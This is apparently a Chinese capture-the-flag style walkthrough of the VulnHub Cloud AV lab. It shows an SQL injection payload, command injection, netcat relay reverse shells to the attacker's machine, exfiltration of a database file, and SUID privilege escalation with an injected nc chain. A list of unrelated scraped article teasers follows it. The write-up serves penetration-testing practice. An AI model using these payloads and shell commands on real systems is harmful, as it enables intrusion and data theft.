easy_cloudantivirus
0x00前言
必须安装在virtualbox
攻击机:kali
靶机 easy_cloudantivirus
链接:
https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/0x01信息搜集
经过测试发现靶场IP为192.168.56.106
进一部对IP搜集信息
发现8080端口youhttp服务。我们去看看有什么东西。
发现有一个页面需要输入邀请码,在这里我们可以尝试一下sql输入。
0x02sql注入
抓到数据包放到bp的intruder模块中。
方法 尝试一些特殊字符,来看看有没有注入。或者直接包数字也OK
! @ # $ % ^ & * ( ) - _ = + { } [ ] | \ ; : ' " , < > . ? /
根据返回的长度查看是否有异常。在尝试爆破后网站可能有问题重启一下就OK。
发现sql语句尝试拼接
payload:a" or 1=1--+
成功
0x03NC串联
页面上的结果类似 ls 所以可以尝试可能存在命令注入。
尝试一番后。
确认。有命令注入。后面就可以反弹shell。
方法 1. 代码 2.nc
这里为了符合主题,展示新的技术我就用nc了
先尝试一个是否能链接成功。
kali
靶机 payload file | nc 192.168.56.105 4444 (kali IP )
4444端口会成功 1111我尝试无果很奇怪。
使用提权参数。
file | nc 192.168.56.105 4444 -e /bin/bash
使用这个一直不成功,所以引出来新的操作。NC串联。
kali需要监听两个端口。
file | nc 192.168.56.105 4444 | /bin/bash | nc 192.168.56.105 5555
链接成功
发现一个sql 使用file查询
0x04查看数据库/发送数据库
发现一个数据库文件
database.sql
file 可以查看文件
file xxx 发现是sqlite3现在靶机上尝试。没有效果只能把文件发给kali来查看
发送数据库
kali接受成功
查看数据库
发现一些数据库源代码,推测有可能是输入一些密码的sql数据。想到靶机还有一个22端口开放
所以我们可以搜集一些用户名,来进行爆破。
0x05爆破SSH
查看用户并且搜集可以登陆的用户
cat /etc/passwd | grep "bin/bash"
root:x:0:0:root:/root:/bin/bash
cloudav:x:1000:1000:cloudav:/home/cloudav:/bin/bash
scanner:x:1001:1001:scanner,,,:/home/scanner:/bin/bash
弄成字典爆破,爆破无果,继续查看其他文件。
0x06suid提权
SUID(Set User ID)是 Linux 文件权限的一种特殊属性,用于在执行文件时临时授予文件拥有者的权限,而不是执行者本人的权限。SUID 提权是利用了设置了 SUID 位的二进制文件来获取更高权限,通常是提权到 root 权限。
也可以用下面的语句 查看有哪些权限位带有S的文件。
find / -perm -4000 2>/dev/null 在查看上层目录文件时发现user权限位有s权限,可能会存在suid提权的方式.
.c是源文件 直接查看.c
简单查看发现使用时需要参数,尝试命令注入.
kali先监听,然后运行下面的语句
./update_cloudav "a | nc 192.168.56.105 2222 | /bin/bash | nc 192.168.56.105 3333"用""是吧他们当作一个整体.
反弹成功
相关文章:
easy_cloudantivirus
0x00前言 必须安装在virtualbox 攻击机:kali 靶机 easy_cloudantivirus 链接: https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 0x01信息搜集 经过测试发现靶场IP为192.168.56.106 进一部对IP搜集信息 发现8080端口youhttp服务。…...
python中Web API 框架
Python 中有几个非常流行的 Web API 框架,它们让你可以轻松地构建和部署高效的 Web API。下面我将为你介绍几个最受欢迎的 Python Web API 框架,及其使用方法和特点。 1. FastAPI FastAPI 是一个现代、快速(非常高性能)的 Web 框…...
Linux(6)--CentOS目录
文章目录 1. 根目录2. cd目录切换命令3. CentOS目录介绍4. pwd命令介绍5. ls命令介绍5.1 ls5.2 ls -a5.3 ls -l 1. 根目录 Windows电脑的根目录是计算机(我的电脑),然后C盘、D盘。 Linux系统的根目录是/,我们可以使用cd /进入根目录,然后使…...
)
标准C++(二)
一、名字空间 什么是名字空间 在C语言中定义的全局变量、函数、结构、联合、枚举、枚举值、宏都在全局作用域下,所以当项目比较庞大时,非常容易造成命名冲突(以模块名作前缀、后缀),所以C中选择把全局作用域进行拆分…...
硬件工程师笔试面试——保险丝
目录 10、保险丝 10.1 基础 保险丝原理图 保险丝实物图 10.1.1 概念 10.1.2 保险丝的工作原理 10.1.3 保险丝的主要类型 10.1.4 保险丝的选择和使用注意事项 10.2 相关问题 10.2.1 保险丝的额定电流和额定电压是如何确定的? 10.2.2 保险丝的熔断速度对电路保护有何…...
本地安装Ollama+WebUI
本地安装OllamaWebUI B站教程地址:https://www.bilibili.com/video/BV1Kz421h7Jk/?spm_id_from333.337.search-card.all.click&vd_source42b07826977d09765ec11b9fa06715e5 一、下载Ollama https://ollama.com/download 支持mac、linux、windows 选择在ubu…...
请求响应-05.请求-日期参数JSON参数
一.日期参数 当浏览器发起的请求参数类型是日期参数时,我们通常使用LocalDateTime对象来接收,前面使用DateTimeFormat注解来完成日期的格式转换(日期时间格式有多种,需要哪种就设置为哪种:如yyyy-MM-dd HH:mm:ss&…...
CSS学习路线
CSS学习路线大全及面试常见题目可以归纳为以下几个部分: CSS学习路线大全 CSS基础 引入CSS的方式:外部样式表、内部样式表、内联样式。CSS选择器:包括ID选择器、类选择器、标签选择器、后代选择器、子选择器、相邻兄弟选择器、兄弟选择器、…...
Linux memcg lru lock提升锁性能
目录 内核关于per memcg lru lock的重要提交: 计算虚拟地址转换基本机制 问题背景 swap换入流程 时奎亮的per memcg lru lock分享视频 内核关于per memcg lru lock的重要提交: f9b1038ebccad354256cf84749cbc321b5347497 6168d0da2b479ce25a4647d…...
【spring】引入 Jackson 依赖 对java对象序列号和反序列化
Jackson Jackson 是一个非常流行的 Java 序列化/反序列化库,用于将 JSON 转换为 Java 对象,或者将 Java 对象转换为 JSON。要在你的 pom.xml 文件中引入 Jackson 依赖,你可以按照下面的步骤进行操作。引入 Jackson 依赖 通常,Jackson 核心库包含以下三个部分: jackson-dat…...
--手撕LayerNormlization)
算法面经手撕系列(3)--手撕LayerNormlization
LayerNormlization 在许多的语言模型如Bert里,虽然都是说做的LayerNormlization,但计算均值和方差只会沿着channel维度做,并不是沿着seq_L和channel维度一起做,参考:BERT用的LayerNorm可能不是你认为的那个Layer Norm LayerNorm…...
出厂非澎湃OS手机解BL锁
脚本作者:酷安mlgmxyysd 脚本项目链接:https://github.com/MlgmXyysd/Xiaomi-HyperOS-BootLoader-Bypass/ 参考 B站作者:蓝空穹 https://www.bilibili.com/read/cv33210124/ 其他参考:云墨清风、水墨青竹、Magisk中文网 决定解BL…...
Go语言错误处理之道:优雅地应对程序中的问题
错误处理是任何编程语言中的关键部分,Go语言以其独特的错误处理机制而著称。对于初学者来说,理解Go语言中的错误处理对于编写健壮和可靠的程序至关重要。 为什么需要错误处理 在编程中,错误处理是必不可少的,因为程序可能会遇到…...
LIMS实验室管理系统的特点
LIMS实验室管理系统在实验室管理中发挥着不可或缺的作用。首要特点是其强大的自动化数据管理功能,该系统能够无缝集成实验室从样品接收到测试结果录入与存储的全过程,显著提升了数据的准确性和可靠性,减少了人为错误的可能性。 流程优化是LI…...
vue之 package.json和package-lock.json
一、package.json 定义了当前项目所需要引用的各个模块,可以手工修改配置,也可以删除后,使用npm init命令重新自动生成。 但是该文件只锁定大版本号,也就是版本号的第一位,所以你会发现两个文件中同一个包的版本号不一…...
android 老项目中用到的jar包不存在,通过离线的方法加载
1、之前的项目用的jar包,已经不在远程仓库中,只能手工去下载,并且安装。 // implementation com.github.nostra13:Android-Universal-Image-Loader // implementation com.github.lecho:hellocharts-android:v1.5.8 这…...
每天五分钟玩转深度学习框架PyTorch:梯度下降之学习率衰减
本文重点 我们前面学习了优化器optim,然后学习了为神经网络不同层设置不同的学习率,本节课程我们讲解学习率衰减的方法,也就是说如何在训练过程中动态的修改学习率,本文介绍两种方法。本文是学习第6步(优化器) 为什么要进行学习率衰减 对于一阶梯度进行优化的方法而言,…...
智能家居配上高颜值UI,瞬间感觉消费不起了呢
高颜值的UI设计可以给智能家居产品带来奢华和高端的感觉,为大家分享一波搞颜值界面。 高颜值的智能家居界面设计可以带来以下优势和好处: 用户体验提升: 高颜值的界面设计可以提升用户的视觉享受和满意度。精美的界面设计可以给用户带来愉…...
Winform登录实现及工具栏切换
1、登录实现 using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms;namespace LoginApp {public par…...
Git bash使用
将本地文件推送到github上 先在所在文件夹进行初始化 git init绑定你的远程仓库 git remote add origin URL 随即 git add 指定文件 ——将工作区域中的文件添加到缓冲区 git commit -m【提交附带的信息】 git push origin master 推送到远程仓库 推送的时候可能会出现一些情…...
)
Sinkhorn算法实战:用Python手把手教你解决最优传输问题(附完整代码)
Sinkhorn算法实战:用Python手把手教你解决最优传输问题(附完整代码) 最优传输理论在机器学习领域正掀起一场静默的革命。想象一下这样的场景:你需要将一组资源从A地运往B地,同时希望运输成本最低;或者你需要…...
突破学术翻译障碍:Zotero PDF Translate文献阅读效率提升指南
突破学术翻译障碍:Zotero PDF Translate文献阅读效率提升指南 【免费下载链接】zotero-pdf-translate 支持将PDF、EPub、网页内容、元数据、注释和笔记翻译为目标语言,并且兼容20多种翻译服务。 项目地址: https://gitcode.com/gh_mirrors/zo/zotero-p…...
想转行AI行业?从入门到精通,掌握人工智能的核心技能!非常详细收藏我这一篇就够了
本文详细介绍了如何转行至算法岗,特别是机器视觉算法工程师的路径。文章首先分析了算法岗的要求,包括学历、项目经验、竞赛成绩等,并分享了个人的转行经历。接着,文章系统地梳理了所需的基础知识,如数学、编程语言、数…...
ComfyUI架构重构:企业级AI工作流引擎的7种部署模式与性能优化策略
ComfyUI架构重构:企业级AI工作流引擎的7种部署模式与性能优化策略 【免费下载链接】ComfyUI 最强大且模块化的具有图形/节点界面的稳定扩散GUI。 项目地址: https://gitcode.com/GitHub_Trending/co/ComfyUI ComfyUI作为当前最强大且模块化的视觉AI引擎与应用…...
告别手动回复!用Python+uiautomation给微信PC版做个关键词自动回复机器人
用Python打造微信PC版智能应答机器人:从消息监控到自动化交互 每次打开微信都被海量消息淹没?客服咨询重复率高达70%?社群运营每天机械回复相同问题?这些场景背后隐藏着一个共同痛点——低效重复劳动正在吞噬现代人的生产力。今天…...
STM32CubeIDE实战:HAL库串口中断接收的5个常见坑点及解决方案
STM32CubeIDE实战:HAL库串口中断接收的5个常见坑点及解决方案 在工业传感器数据采集、设备间通信等场景中,稳定可靠的串口通信往往是嵌入式开发的关键环节。许多开发者在使用STM32CubeIDE配合HAL库实现串口中断接收时,虽然能够快速搭建基础功…...
Verilog新手避坑指南:从HDLBits的Getting Started到Vectors,我踩过的那些坑
Verilog新手避坑指南:从HDLBits的Getting Started到Vectors,我踩过的那些坑 第一次接触Verilog时,我像大多数初学者一样,被它既像C语言又不像C语言的语法搞得晕头转向。HDLBits这个在线练习平台确实是个好帮手,但当我从…...
)
避开这些坑!Anthropic Computer Use在Mac上的安全使用指南(含Streamlit界面优化技巧)
避开这些坑!Anthropic Computer Use在Mac上的安全使用指南(含Streamlit界面优化技巧) 在Mac上探索AI工具的边界时,Anthropic Computer Use无疑是一把双刃剑。它既能让你通过自然语言指令操控整个系统,也可能因权限过高…...
从零到一:构建高性能Infiniband/RDMA集群的实践指南
1. Infiniband与RDMA技术基础 第一次接触Infiniband时,我被它惊人的性能数据震撼到了——200Gbps的传输速率,微秒级的延迟,这完全颠覆了我对传统以太网的认知。简单来说,Infiniband就像是为数据中心量身定制的高速公路,…...
艾法斯 IFR2948B 综合测试仪 Aeroflex 2948B IFR 2945B
艾法斯 IFR2948B 综合测试仪 Aeroflex 2948B IFR 2945B 2948B是2945B的低噪声型号,其射频源的相位噪声比2945B有了很大改善,可用于精确测量窄带接收机。重量轻便于携带及野外测试;全扫宽频谱分析仪--支持“Look&listen”模式;标准配置带支持频率偏移方式的跟踪发生器;支持高…...